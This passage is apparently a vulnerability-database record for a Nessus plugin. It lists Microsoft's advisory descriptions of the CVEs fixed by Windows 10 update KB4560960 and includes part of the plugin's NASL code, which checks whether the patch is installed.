- An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when the\n Windows Spatial Data Service improperly handles objects\n in memory. An attacker could exploit the vulnerability\n to overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-1441)", "edition": 11, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-09T00:00:00", "title": "KB4560960: Windows 10 Version 1903 and Windows 10 Version 1909 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1244", "CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1277", "CVE-2020-1207", "CVE-2020-1275", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1273", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1441", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1307", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1209", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1313", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1296", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1204", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1265", "CVE-2020-1268", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1206", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1248", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "modified": "2020-06-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4560960.NASL", "href": "https://www.tenable.com/plugins/nessus/137254", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137254);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/13\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1204\",\n \"CVE-2020-1206\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1209\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1244\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1248\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1265\",\n \"CVE-2020-1266\",\n \"CVE-2020-1268\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1273\",\n \"CVE-2020-1274\",\n \"CVE-2020-1275\",\n \"CVE-2020-1276\",\n \"CVE-2020-1277\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1296\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1307\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1313\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\",\n \"CVE-2020-1441\"\n );\n script_xref(name:\"MSKB\", value:\"4560960\");\n script_xref(name:\"MSFT\", value:\"MS20-4560960\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0300-S\");\n\n script_name(english:\"KB4560960: Windows 10 Version 1903 and Windows 10 Version 1909 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4560960. It is, \ntherefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1273, CVE-2020-1274, CVE-2020-1275,\n CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Server Message Block 3.1.1\n (SMBv3) protocol handles certain requests. An attacker\n who successfully exploited the vulnerability could\n obtain information to further compromise the users\n system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when a\n Windows service improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1265, CVE-2020-1282, CVE-2020-1304,\n CVE-2020-1306, CVE-2020-1334)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when the\n Windows Spatial Data Service improperly handles objects\n in memory. An attacker could exploit the vulnerability\n to overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-1441)\");\n # https://support.microsoft.com/en-us/help/4560960/windows-10-update-kb4560960\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?98e819b7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4560960.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1307\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows Update Orchestrator unchecked ScheduleWork call');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4560960'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, 